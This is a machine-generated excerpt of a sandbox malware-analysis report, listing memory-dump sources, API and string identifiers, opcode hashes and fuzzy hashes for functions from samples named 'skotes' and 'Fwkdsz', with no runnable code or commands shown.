                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927841191.00000000007C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930007833.000000000095E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930452154.0000000000960000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_4b0000_skotes.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                • String ID: S9N$csm
                                                                                                                                                                                                                                                • API String ID: 1170836740-3115568138
                                                                                                                                                                                                                                                • Opcode ID: 28731cc91c87c660e4126385401df67582d45d6a69771bfa52913f666dd56270
                                                                                                                                                                                                                                                • Instruction ID: 9de9f4da59c1ddccc40b59d6d59df0e1793adb86e2af616fcad861135ec4f7e2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 28731cc91c87c660e4126385401df67582d45d6a69771bfa52913f666dd56270
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 02512A749001889BCF10DF2AC884AAF7BB5BF85319F148157E814AB352C73ADD15CB95
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2922402588.00000000004B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922189527.00000000004B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922402588.0000000000512000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923453883.0000000000519000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.000000000051B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000006A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.000000000077F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007AB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927841191.00000000007C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930007833.000000000095E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930452154.0000000000960000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_4b0000_skotes.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Mtx_unlock$CurrentThread$Cnd_broadcast
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 57040152-0
                                                                                                                                                                                                                                                • Opcode ID: 0c0debe1338b4e03989d034699c05080bf2318c5d4a98e3a8d3587c772b60cd8
                                                                                                                                                                                                                                                • Instruction ID: 7331f1fc97c833289c8d8c08ed8dbfb8ad186251e6baf0da91d1f0da5312b1c0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0c0debe1338b4e03989d034699c05080bf2318c5d4a98e3a8d3587c772b60cd8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B2A1D274A012059FDB10DF66C944BABB7A8FF15315F04816EE819D7341EB39EA04CBA5
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2922402588.00000000004B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922189527.00000000004B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922402588.0000000000512000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923453883.0000000000519000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.000000000051B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000006A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.000000000077F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007AB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927841191.00000000007C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930007833.000000000095E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930452154.0000000000960000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_4b0000_skotes.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ___free_lconv_mon
                                                                                                                                                                                                                                                • String ID: ,mN$8"Q$`'Q
                                                                                                                                                                                                                                                • API String ID: 3903695350-3720420920
                                                                                                                                                                                                                                                • Opcode ID: 5336bc240501d6a929ff751636cc31c4eb9e4d68737f66d746394855fdc2a40e
                                                                                                                                                                                                                                                • Instruction ID: aaf282b0f47a3840ef6044d5e89ba4be529962909687f86ab90450a807c8c15b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5336bc240501d6a929ff751636cc31c4eb9e4d68737f66d746394855fdc2a40e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0F316931600781EFEB21AA3BD845B5B73EAFF0031BF10442BE445D6691DE78A8948A29
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2922402588.00000000004B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922189527.00000000004B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922402588.0000000000512000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923453883.0000000000519000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.000000000051B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000006A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.000000000077F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007AB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927841191.00000000007C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930007833.000000000095E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930452154.0000000000960000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_4b0000_skotes.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _strrchr
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3213747228-0
                                                                                                                                                                                                                                                • Opcode ID: c90ae3db66b5619743134332522a0b96de832b73a835be1452314c5289bd2e52
                                                                                                                                                                                                                                                • Instruction ID: 029cfba34e8025a72eba673cbd6b9b1e12e2f5d5d1f723734f9409a643b43934
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c90ae3db66b5619743134332522a0b96de832b73a835be1452314c5289bd2e52
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 48B112329002C59FDB158F2AC8C1BBEBBA5EF45345F2441ABE855EB341D6399D03CB68
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2922402588.00000000004B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922189527.00000000004B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922402588.0000000000512000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923453883.0000000000519000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.000000000051B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000006A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.000000000077F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007AB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927841191.00000000007C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930007833.000000000095E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930452154.0000000000960000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_4b0000_skotes.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 531285432-0
                                                                                                                                                                                                                                                • Opcode ID: dbf24f1b02c74065d3b0f65be1d84c6f459ec3887c6e9d62e00099f68a2b1fac
                                                                                                                                                                                                                                                • Instruction ID: ddce9aae9a9ad805a1a51d2a5b2b223544a44cc7f7aa1e2746412328fc8fac43
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dbf24f1b02c74065d3b0f65be1d84c6f459ec3887c6e9d62e00099f68a2b1fac
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4E214F79A00109AFDF40EFA5CD82EBEB7B9EF08714F10005EF505A7291DB389D019BA5
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 004BE4F9
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2922402588.00000000004B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922189527.00000000004B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922402588.0000000000512000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923453883.0000000000519000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.000000000051B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000006A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.000000000077F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007AB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927841191.00000000007C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930007833.000000000095E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930452154.0000000000960000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_4b0000_skotes.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                • String ID: L1Q$invalid stoi argument
                                                                                                                                                                                                                                                • API String ID: 909987262-4022350853
                                                                                                                                                                                                                                                • Opcode ID: a0bfd2c73ed26c8495a733fac75312cb26e260ae6c6b51208fbce3686b4bf1e5
                                                                                                                                                                                                                                                • Instruction ID: 88f56f225b512452ab39b320cf90600a0de94d22d57b48ac7e2f87a40e47c739
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a0bfd2c73ed26c8495a733fac75312cb26e260ae6c6b51208fbce3686b4bf1e5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 79F0C271900210ABD7209B6A9C06ADB33E8EB59714F00482AED1893242DB74A804D6A7
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2639786281.0000000002B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_2b20000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: L>>/:;a[)iUq$TJcq$Te^q$pbq$xbaq
                                                                                                                                                                                                                                                • API String ID: 0-725434556
                                                                                                                                                                                                                                                • Opcode ID: 32618b206b827d6bb52f25d34150ee7a145aebca773752de576f424107d26c10
                                                                                                                                                                                                                                                • Instruction ID: 80440a99f07e8d733a12fcdbaef18392dbe1df5717845855cc99fd3a8db43fc2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 32618b206b827d6bb52f25d34150ee7a145aebca773752de576f424107d26c10
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 48A2D575A00228CFDB64DF69C984A99BBB2FF89304F1581E9D50DAB325DB319E85CF40
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2639786281.0000000002B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_2b20000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 4'^q$4'^q
                                                                                                                                                                                                                                                • API String ID: 0-2697143702
                                                                                                                                                                                                                                                • Opcode ID: 8c2560189badea0bd0b02bbfb95f22092e2c96be754c5119d5a89a186cc43bcf
                                                                                                                                                                                                                                                • Instruction ID: edeb014cfbf6be280aa50db7853b74c7fe9eb8f67177fefcbfc531ef45734f31
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c2560189badea0bd0b02bbfb95f22092e2c96be754c5119d5a89a186cc43bcf
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 99711570E012098FDB18EF6FE85469EBBF3BBC9304F14C569D009AB268EB755846CB51
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2639786281.0000000002B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_2b20000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 4'^q$4'^q
                                                                                                                                                                                                                                                • API String ID: 0-2697143702
                                                                                                                                                                                                                                                • Opcode ID: b3c0eddc3ba70a00643d56c7bc6bba177da26ca7c3a0c66660daa3b9f3648381
                                                                                                                                                                                                                                                • Instruction ID: d555ac393f2b194c1d3ba4bd7b07003198347568aa1d2a8b89b9c17a2b1c1a79
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b3c0eddc3ba70a00643d56c7bc6bba177da26ca7c3a0c66660daa3b9f3648381
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3771F670E112098FDB18EF6FE85469EBBF3BBC9304F14C569D009AB268EB755846CB41
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2706984918.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_74c0000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: Deq
                                                                                                                                                                                                                                                • API String ID: 0-948982800
                                                                                                                                                                                                                                                • Opcode ID: 9671037a6b0cc54cc3b59898832dabb156fbecfaafc4a88fe928f0dd95446c74
                                                                                                                                                                                                                                                • Instruction ID: 5c1177c075cd3fa373218671df7a3a4bf765cdd52e6f1c0e40008694b733fc4a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9671037a6b0cc54cc3b59898832dabb156fbecfaafc4a88fe928f0dd95446c74
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9CD1D474E00219CFDB54DFA9D994B9DBBB2BF89300F2081A9D409AB364DB31AD81CF41
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2639786281.0000000002B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_2b20000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: (bq$(bq$(bq$(bq$(bq
                                                                                                                                                                                                                                                • API String ID: 0-2298650571
                                                                                                                                                                                                                                                • Opcode ID: c54d46fcb76f49a27f20afacef77e4e653098a1b3360b3d1444530001f5cc0c9
                                                                                                                                                                                                                                                • Instruction ID: 3ffb82c38a8bf083306f6a61fc3741080b63209230ed053380e8699935d8855b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c54d46fcb76f49a27f20afacef77e4e653098a1b3360b3d1444530001f5cc0c9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ECB1F1367042654FDB14DF69D850AAE3BE6EFC5711B1480AAE90ACB791CF35DC06CBA0
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2706800945.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_74b0000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 5$6
                                                                                                                                                                                                                                                • API String ID: 0-3820194390
                                                                                                                                                                                                                                                • Opcode ID: 71f74907f20ee748f7f4e80cee6df7f20a4505bba150ed58bac984a80c5153cb
                                                                                                                                                                                                                                                • Instruction ID: 389a6672776cdb8527d9d03e71437aff1a6fa2e0dd726624cf860978ffdecbd0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 71f74907f20ee748f7f4e80cee6df7f20a4505bba150ed58bac984a80c5153cb
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6631ACB4905229DFDB60DF24CE84BD9BBB2AB49304F4085EAD50DA7250DB35AE82CF50
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2706800945.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_74b0000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: +$G
                                                                                                                                                                                                                                                • API String ID: 0-3523822982
                                                                                                                                                                                                                                                • Opcode ID: b35c0e7df4042434271c659d5daf1df51fb23ff90fa1c2490eb9c7aa14bbc33a
                                                                                                                                                                                                                                                • Instruction ID: 5263b1ee38eccd6e852a3a6a9decebb6bd5fb4c649db7c0f957aac2ff15e5c84
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b35c0e7df4042434271c659d5daf1df51fb23ff90fa1c2490eb9c7aa14bbc33a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 78119EB4904228CFDB60DF64CD44BDABBB1AB89304F0081EA954DA7394DB365E86CF50
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2639786281.0000000002B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_2b20000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: (_^q
                                                                                                                                                                                                                                                • API String ID: 0-538443824
                                                                                                                                                                                                                                                • Opcode ID: 06a274a33bf7d8b184342050b24ea273199e771c60aab2fbfaa3f8dadcc1e8c6
                                                                                                                                                                                                                                                • Instruction ID: 9c833182445a83265e27e4da1328cfaf467bdf6c85c20b8fe566b47ecf4f1a97
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 06a274a33bf7d8b184342050b24ea273199e771c60aab2fbfaa3f8dadcc1e8c6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 08225D35A002259FDB14DFA5D494A6DB7F2FF88300F1884A9E906EB3A1DB75EC49CB50
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2639786281.0000000002B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_2b20000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: sq
                                                                                                                                                                                                                                                • API String ID: 0-1320738648
                                                                                                                                                                                                                                                • Opcode ID: 40d61523a37c55a96565f09ea23f579a1fb073efce189134c305ef6c06bb8a77
                                                                                                                                                                                                                                                • Instruction ID: 9b7afb21ae1ad7303a5d074833644220b370d870fa0834ee8868281442b640f2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 40d61523a37c55a96565f09ea23f579a1fb073efce189134c305ef6c06bb8a77
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 01416BB09063189FEB01EFA8C4487AEBBF2FF85305F1491AAD109E7255D7744A49CB61
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2639786281.0000000002B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_2b20000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: Te^q
                                                                                                                                                                                                                                                • API String ID: 0-671973202
                                                                                                                                                                                                                                                • Opcode ID: e652f683813186876b7cadcf731ccfc0f6152237a7f2dac8d565de9b95ef9bc2
                                                                                                                                                                                                                                                • Instruction ID: 1a97cf69a79202faabbb8e2aa0b8f71d9ae1d0a8a724925abffb433d69db4ac0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e652f683813186876b7cadcf731ccfc0f6152237a7f2dac8d565de9b95ef9bc2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D614B34B002149FC704EF69D598AADBBF2FF89710F1584A9E40AEB365DB31AC46CB51
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2639786281.0000000002B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_2b20000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: Te^q
                                                                                                                                                                                                                                                • API String ID: 0-671973202
                                                                                                                                                                                                                                                • Opcode ID: 26b8b50172a842d050dd6c879caf325bac546653309df8eecc7ae0e0a002b5ab
                                                                                                                                                                                                                                                • Instruction ID: c3b50a7b03179ca047cf75f15fea3e75cdb41d4a0c489b525713c34642496808
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 26b8b50172a842d050dd6c879caf325bac546653309df8eecc7ae0e0a002b5ab
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5A519170B042549FC705EF78D464A9DBFF2AF9A610B15849AE445DB3A2CA309C49CB51
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2639786281.0000000002B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_2b20000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: Te^q
                                                                                                                                                                                                                                                • API String ID: 0-671973202
                                                                                                                                                                                                                                                • Opcode ID: e16090a9447d1fc853d9ba54191823680f40fd3bc8f667bda8e40ba6db72ae2a
                                                                                                                                                                                                                                                • Instruction ID: 6c71ea8a6af12b68bd5565d3b2f64a86b0d4cdaec14b6b35850e044a8bce64cb
